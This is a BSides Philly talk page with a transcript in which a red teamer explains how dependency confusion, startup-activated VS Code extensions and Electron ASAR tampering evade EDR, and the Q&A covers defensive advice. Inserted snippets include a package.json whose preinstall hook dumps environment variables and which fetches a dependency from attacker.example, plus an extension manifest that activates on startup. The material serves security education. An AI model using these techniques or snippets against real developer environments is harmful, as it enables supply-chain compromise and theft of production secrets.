
Hiding in Plain Sight - Weaponizing Developer Applications and Interpreted Languages to Evade EDR

BSides Philly · 2025 · 26:51 · 160 views · Published 2026-02 · Watch on YouTube ↗
About this talk
Demonstrates how trusted developer applications—IDE extensions, Electron apps, and interpreted language environments—can be weaponized to evade sophisticated EDR solutions. Covers hijacking VS Code extensions, npm package confusion attacks, and ASAR integrity flaws to establish persistent access and blend malicious activity with legitimate developer workflows.
Original YouTube description
Presenter: Annika Clarke. As endpoint detection and response (EDR) solutions evolve to counter traditional intrusion techniques, organizations often develop a false sense of security, relying heavily on these tools to detect and mitigate threats. This presentation challenges that perception by exposing how trusted developer tools, such as IDE extensions, Electron applications, and interpreted language execution environments, can be weaponized to bypass the most sophisticated detection mechanisms. The inherent risks posed by trusted applications and developer environments are often critically overlooked. This talk demonstrates how to exploit this blind trust by using high-level languages like Node.js and Python to hijack legitimate applications, bypassing traditional endpoint controls and signature-based detection. Attendees will gain insights into how these methods were developed and successfully deployed during real-world red team engagements.
Transcript [en]

Awesome. >> Thank you. So again, my name is Annika Clarke, and I'm here to talk about the malware that I developed for developer environments and interpreted languages, and how it bypasses modern-day EDRs. Quickly, a little about me: I'm a red teamer, pentester, and offensive security engineer at Security Risk Advisors here in Philly. My main focus is offensive technique and tool development. I do a lot of social engineering, and development for social engineering, and then also the color pink: all my code is pink, all my terminals are pink, so just a warning. So the motivation for this whole talk is red

teams. So at SRA we conduct long-term, full-scope red team engagements, starting at the social engineering and OSINT phases and going all the way through advanced Windows exploitation. Within these assessments, stealth is the primary goal: we aim to bypass the detection mechanisms that our clients have and compromise their systems as quietly as possible, so that we're providing them with a real-world adversarial test and can better protect them. And the techniques that I'll be discussing in this talk are still being exploited in the wild right now, which is really exciting. Within the current landscape, we're seeing EDRs, or endpoint detection and response platforms, becoming more and more advanced. They can correlate

behavior and processes. They have sophisticated anomaly detection and advanced notification systems, so when an incident is happening there's a lot of communication and synchronization, and there's also real-time monitoring. So we're actively fighting against these EDR platforms. Additionally, client environments in general are just becoming more and more secure. They're hardened against well-known tactics and techniques. And the clients that use our red teams and ask for those types of assessments typically have a much more mature security environment compared to companies that are just entering the security space and might use pentests or more defensive assessments. And so these

clients that we have are very secure and strong, so they provide a big challenge to bypass. Additionally, the traditional techniques that we were using in previous red teams, and even pentests, are beginning to be phased out, because they're highly signatured, easily detected, and make a lot of noise. So we need to retire those techniques and innovate, just as threat actors in the industry do. Again, all of these techniques we're seeing actively exploited even in the past month. So why developer environments? In my opinion, hijacking developer environments is really the future of enterprise exploitation,

and these techniques are incredibly powerful, because they require no phishing, no user interaction, and no direct attacker interaction with the environment. We utilize build pipelines and developer CI/CD pipelines: they execute our malicious code automatically and often, and there's not a whole lot defenders can do against it, because we're able to blend our traffic in with authorized developer activity. Basically, developers create anomalous traffic to the point where it's expected. They're constantly reading and writing files, executing code, compiling code, doing suspicious-looking things all the time, but that's just in their job

description and their expected role. Developer environments inherently generate a lot of this anomalous activity, and we're able to blend in within it. Additionally, we can hijack trusted libraries and applications. There's a blind trust in how we view all of these developer applications: VS Code, for example, is a blindly trusted application, and we'll discuss how we're actually able to hijack it. Developers also have open-ended roles and permissions, which I already touched on: someone who is a developer has to have a wide range of access and highly permissioned accounts, compared to someone in HR or sales, who has much more locked-down

applications and job processes. So controlling these developer accounts is incredibly difficult. Additionally, the false positives and alerting are really tedious, because companies don't want to put strict constraints on developers; that can impact productivity pretty dramatically. Constantly pinging developers about what they're doing and asking whether it's legitimate would really impact their workflow, and usually they're creating the company's end product itself. So here are the three topics I'll be discussing today: dependency confusion, malicious VS Code extensions, and Electron application backdooring. Dependency confusion is a really powerful attack, and first, before I

describe the attack, I'm going to explain what most companies believe their environments look like. Most companies believe that if they're using an internal repository and all their packages are private, their workflow looks like this: a developer needs to install a library, they ping the internal repository, the repository brings back that library, and they're able to program with that logic. Now, this is what the company actually looks like if you have not configured anything beyond the defaults. And what we're able to do is use npmjs.org basically as a direct channel to tunnel our malware into developer environments, because by default, before pulling from the internal repository, npm always checks externally

first. To give you a scenario of how this works, imagine you're a company that's using Node within your applications, constantly building and developing, and you need a package; everything is internal, or so you think. Now imagine that one day an attacker enters your environment. They gain a foothold, they're able to enumerate and move laterally, and they find some code snippets or repos. From there, they find the package name and the version number, and they check whether it's public; in this case there wasn't a public package yet. So they create that package,

make it one version higher, publish it to npmjs.org, and then sit and wait. What's really cool about this is that these developer pipelines run our code for us; we don't have to do any direct interaction with the system. So you sit and you wait, and within a day, two days, a week, a month, whatever the build cadence of the library you hijacked is, you will be able to channel directly into their developer environment. And this is not a hypothetical situation. This happened last summer, where we were able to gain full production access to our client's environment. Every single production key was able to be

exfiltrated through this method, where we sat and waited for our code to be run. What was actually kind of funny was that, because these build pipelines are a little unreliable, and if you don't know the exact processes and systems it can take a short time or a long time, we didn't actually get these results until about three or four weeks after the engagement ended. Which was kind of funny, but it shows that you can do so much damage with so little knowledge. All you need is the package name and the version, and if the package isn't public and your company's environment is not tailored

to accommodate npm's vulnerable resolution logic, then malware can be channeled into your network or environment without your knowledge. So again, this hijacks npm's default behavior and exploits its vulnerable update logic: as long as the public package is one version higher, even a minor version, npm will pull that package regardless. This is a really useful technique for initial access; sometimes these library names are exposed publicly and you're able to hijack them externally. You can use it for persistence, where every single time that build pipeline is run it will spawn a beacon; and you can exfiltrate data, as we did in this example.
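The update logic just described can be sketched as a tiny model. This is a simplified illustration of the behavior, not npm's actual resolver: version strings are assumed to be plain major.minor.patch numbers, and the comparison ignores semver ranges and prerelease tags entirely.

```javascript
// Sketch of the "highest version wins" resolution behavior described
// above -- a simplified model, NOT npm's real implementation.
// Versions are assumed to be plain "major.minor.patch" strings.

function compareVersions(a, b) {
  const pa = a.split(".").map(Number);
  const pb = b.split(".").map(Number);
  for (let i = 0; i < 3; i++) {
    if ((pa[i] || 0) !== (pb[i] || 0)) return (pa[i] || 0) - (pb[i] || 0);
  }
  return 0;
}

// Given the version available internally and the version an attacker
// published publicly, the higher one is what a naive resolver installs.
function resolveSource(internalVersion, publicVersion) {
  if (publicVersion === null) return "internal"; // no public package exists
  return compareVersions(publicVersion, internalVersion) > 0
    ? "public" // attacker's package wins
    : "internal";
}

console.log(resolveSource("2.4.1", null));    // → internal
console.log(resolveSource("2.4.1", "2.4.2")); // → public (one minor bump is enough)
```

Even a one-patch bump over the internal copy is enough to flip the resolution to the attacker-controlled package.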

Just for context, this is what an npm library looks like: it has a readme, code, dependencies; it just houses the code. At its most baseline, the library structure needs a package.json and an index.js. The most important things here are the preinstall script and the dependencies. The preinstall script is what triggers the actual logic within the library. As you can see, there was a lot more logic that we had to build into this specific exploit for the red team, but at its most bare bones,

the commands we were running on these developer machines were just extracting the environment variables. If this were done by, say, a sales or HR person in PowerShell, it would obviously trigger some major alerts, but developers need to do that all the time; that's how these build pipelines work, with secrets set in environment variables. So it's expected behavior, which makes this so powerful. Additionally, there's devDependencies versus dependencies, which determines where you will land in the environment: dependencies are run whether it's development or production. And if we don't actually have access to the code base, because we only found the library

name and version, then without the real logic in the package we publish, we can break production systems. The devDependencies case can be even more dangerous, because it's only run in development: there won't be as obvious a breakage, and you can probably live on their system for longer. Quickly, this is a really interesting technique as well: instead of naming your package dependency with just a version number, as in the previous example, you can also put in a URL. And if you control that URL, it doesn't show up as any

dependencies. And this is really bad, because it lowers the guard in scanning and makes companies think they don't have these dependencies and aren't vulnerable to this style of attack. So, to compare dependency confusion against EDRs: external requests to npmjs.org are completely expected, because you might have external packages that you're utilizing, like the very common ones that are in all Node projects. We obfuscated the code that we uploaded to npmjs.org as our malware, and that's also relatively expected, because there are many legitimate reasons why a developer would upload obfuscated code or minified JavaScript.
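At its most bare bones, a package like the ones described above is just a package.json. The following sketch is hypothetical: the package name, the version (assumed one higher than the internal copy), and the tarball URL are all invented for illustration, and a real payload would carry far more logic than this env-dumping one-liner.

```json
{
  "name": "internal-billing-utils",
  "version": "4.2.0",
  "main": "index.js",
  "scripts": {
    "preinstall": "node -e \"console.log(JSON.stringify(process.env))\""
  },
  "dependencies": {
    "build-helper": "https://attacker.example/build-helper.tgz"
  }
}
```

The preinstall hook runs automatically on `npm install`, and the URL-style dependency is the variant that does not appear to scanners as a normal name-plus-version entry.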

Additionally, the preinstall script and the JavaScript execution: seeing those run on a system is literally how Node works. If there's no preinstall and no execution, then there are no libraries and no functionality. These need to run, so detecting on that alone would be incredibly ineffective. Okay, so I want to scan the audience really quickly. Who here uses VS Code? Okay, awesome. And who here has audited every single VS Code extension, like you know exactly what it does? One. Okay, maybe one person. I always say: I built this malicious extension, and even I don't check. Who knows what's on my VS Code in terms

of extensions, auditing and knowing exactly what each one does. But here's why you should care. We were able to build this malicious VS Code extension, and while I talk, I want you to look at this list and think about which one you think is malicious, the one that I built. What we did was drop it on our victim's developer disk, and we were able to spawn a beacon: every single time that VS Code was open and running, we had persistent access to their machine. So, any guesses, any numbers that stand out to you? >> Number seven.

>> Seven. Okay. Anyone else? Okay. So it actually is number seven; I don't know how you got that. If you look here, compared to everything else it all relatively blends in. And this is just in your home directory, which is what makes this so dangerous: we were able to just drop this functionality into their home directory. So again, this is the malicious one, and this is the general structure. It's important because we were dropping this on disk, and that means we bypassed the Microsoft store. So all of

the configuration on here is strictly cosmetic. There was no verification; it's actually just a package.json file that you fill in, and I copied all of it from an existing readme: the changelog, the categories. The one thing I did want to point out is that this .vsix entry will show up if the extension was dropped to disk; but again, there are legitimate reasons why a developer would have something custom-tailored sitting on their disk, so that inherently does not raise blatant red flags. Again, this is very similar to the Node case: you need a package.json and an extension.js, and the most important things in this

code are the activation events and the main entry. The main field is what calls extension.js. The functions here have a bit more nuance, but at their most bare, again, we were just running a C2 payload. If you understand how these applications are structured and how they work, at their most basic level as well as their most complex, you're able to hijack them, and again you're hiding in that developer environment. The activation events are important because they're what trigger your VS Code extension to run. We specifically wanted it to run on

startup, which is what this asterisk means: any time VS Code is up and running, we have persistent access to the machine. Now, comparing this to other techniques: again, we're able to bypass the Microsoft store. There's a variety of extension triggers, so depending on how you want to tailor your tooling to the client environment, you can trigger on debugging, you can trigger on specific languages; there's a lot of customization. There's also a legitimate developer need to have these extensions, right? You need Python installed; whatever you're developing in, there's a need for extensions for the application to work

properly with the code that you're building. And again, process specifics are hidden by VS Code: extensions run under an extension host process, and there aren't any major standout processes when these extensions are running. So again, versus EDRs: the local disk activity is expected. We're dropping these into the home directory, developers are constantly dragging and dropping files, and extensions are constantly being updated as they run, so activity within that directory is actually expected. Extension code execution is also expected; they're constantly running code, that's just how they exist. And when our implant was pinging out, that network activity is expected too.
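The extension pieces described above, at their most bare, reduce to a manifest like this one. The names, publisher, and versions here are invented for illustration; the `"*"` activation event is the startup trigger mentioned, and `main` points at the extension.js that would carry the payload.

```json
{
  "name": "code-format-helper",
  "displayName": "Code Format Helper",
  "publisher": "hypothetical-publisher",
  "version": "1.3.0",
  "engines": { "vscode": "^1.80.0" },
  "categories": ["Formatters"],
  "activationEvents": ["*"],
  "main": "./extension.js"
}
```

extension.js then only needs to export an `activate()` function; in the engagement described, that function launched the C2 payload.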

If they're running any sort of code pipeline, there's going to be some form of network activity; if they're importing libraries, there's going to be external reach-out. So all of this is expected activity, and that's how we were able to bypass EDRs. Moving into Electron applications, and the blind trust that we have in VS Code and npmjs.org: we have that same trust in Electron applications. To give examples, Electron applications are Teams, Slack, Obsidian, all of these really big platforms that are inherently trusted and are on the company portals wherever you work. They tend to be

just readily available and trusted. These are Chromium-based applications, so think web browser, but the majority of them are not shipped with a sandbox by default. They allow custom API access to the operating system and full read/write file system access; a lot of them ship with a Node.js runtime, as well as full network access. This sounds incredibly vulnerable, so why is it built that way? The main three reasons are consistency, so it's the same on Mac as on Windows as on Linux; self-containment, so that it

ships with every resource that is needed within the application, downloaded onto your environment; and, tied into that, independence from the host. If someone has never coded before and doesn't have Node on their system, or has an outdated version, they don't want the application to malfunction. So it all ships in one package, but we're able to hijack the trust that exists within these applications. The big issue here is ASAR integrity. ASAR stands for Atom Shell Archive format; it's essentially just a glorified zip file with basically no encryption. And I

was able to confirm that, for Obsidian specifically, these two protections are disabled: EnableEmbeddedAsarIntegrityValidation and OnlyLoadAppFromAsar. The integrity option being off means the application does not validate the contents of the ASAR file; because it's not encrypted and it's all on the local disk, we're able to unpack or extract it, add and inject our custom code, and there's no validation of that. Additionally, OnlyLoadAppFromAsar being off allows the application to load from a non-ASAR source, so we can inject arbitrary code and have it

read from plain directories as well. This is obviously incredibly dangerous, because if there's no integrity check, you can inject any code you want. In general, these applications search within either local app data or a config directory, depending on what OS you're using, for resources/app.asar. What you can do is delete it, or run the app from a different directory; if app.asar isn't there, the application falls back to the resources/app directory, and you're able to load whatever code you want in there.

Different applications ship with varying levels of these protections; as we see here, some of these options are enabled and some are disabled, so this is not universal, but many applications are shipped with these insecure configurations. And as you can see here, we can inject code. Again, I have a lot of these snippets showing the most basic, unobfuscated form: we spawn a beacon on the system just by the application opening and running. It shows that all of these techniques are sneaky; they just live inside the application's normal run and default behavior. So if you haven't configured anything beyond

what you are given by default, then we're able to bypass that and hide our traffic within it. Briefly, this was inspired by Loki C2, a really cool platform on GitHub with a bunch of different backdoors; a bunch of smart people discovered these vulnerable applications and have contributed a lot, so it's a really interesting tool and was the inspiration for this. Moving into how this compares against EDRs: these attacks hijack legitimate binaries. With the lacking ASAR integrity, the signature remains the same, because we're editing these

user-space files. And there's this blind trust: we trust Obsidian, we trust Teams, we trust all these applications, and if the signature remains intact, which I talked about earlier, there's not the same detection from an EDR standpoint. So, in conclusion, to wrap up developer environments and why these techniques are so valuable: they provide a direct channel into some of the most sensitive assets a company owns, and they don't require social engineering; there's no direct user or attacker interaction. We sit and we wait. You develop and you build and you figure out creative ways to mimic

threat actor innovation. The security controls needed to fix these issues are incredibly difficult to implement, because the attacks utilize the inherent processes and behaviors of these applications; by blocking or banning certain things, you might completely eliminate usability and your developers' ability to create a high-quality product. Additionally, there's the volume of traffic: developer behavior is inherently anomalous, and these processes and permissions are required by the role. So we're able to blend our malicious activity in with developer activity, and it becomes almost impossible to distinguish; in other words, we hid in plain sight. Thank you. All

right. Very well done. Does anyone have questions they'd like to ask? >> Perhaps this is out of scope, or maybe you don't have an opinion on this, but I wanted to ask: if you were hired as an advisor by a detection company, you know, CrowdStrike or whatever, are there any signatures you might suggest to them that would limit the false positives as much as possible? >> Yeah. So I would say, definitely within VS Code specifically, having some form of audit on those extensions, or organization-wide rules on what can be installed, or some sort of

approval process. I definitely think flagging things that are obfuscated from the jump, certain things like that which would indicate some of that malicious activity. From the Electron standpoint, ensuring that there's some sort of signature on the ASAR files, and tracking more of that local disk behavior rather than inherently trusting the applications. And because a lot of these actions don't impact the signature of how the applications run, I would say monitoring more of that trusted user disk activity within the developer realm, and trying to figure out a more effective way to differentiate those files being modified versus it

just being normal disk activity, if that makes any sense. >> You mentioned obfuscation and VS Code extensions. Can you be a little bit more specific about what you mean? >> Basically, whenever we created the code that we dropped on the system, all of our actual logic was obfuscated. >> Thank you. >> Yeah, of course. >> Anybody else, any more questions? >> Hey, nice talk. Thank you. >> Thank you. The one question I had was: you were saying that it's commonplace for VS Code extensions to reach out to the internet, and so you can get your beacon through there, with the exception of random

domains that it's never seen before. So, from a red team perspective, what type of C2 traffic are you using to be able to slip by there? >> Yeah. Specifically, we have some very advanced internal tooling that we utilize for that C2 traffic. We were utilizing Mythic and things like that, and we had custom integrations. So the specific traffic I can't speak to accurately at this moment, but we had some very advanced tooling that other co-workers had created, which we were able to harness within this application. >> We have time for one more quick question,

if anybody has one. Anybody? All right. >> Awesome. >> Okay, so thank you so much. >> Thank you guys.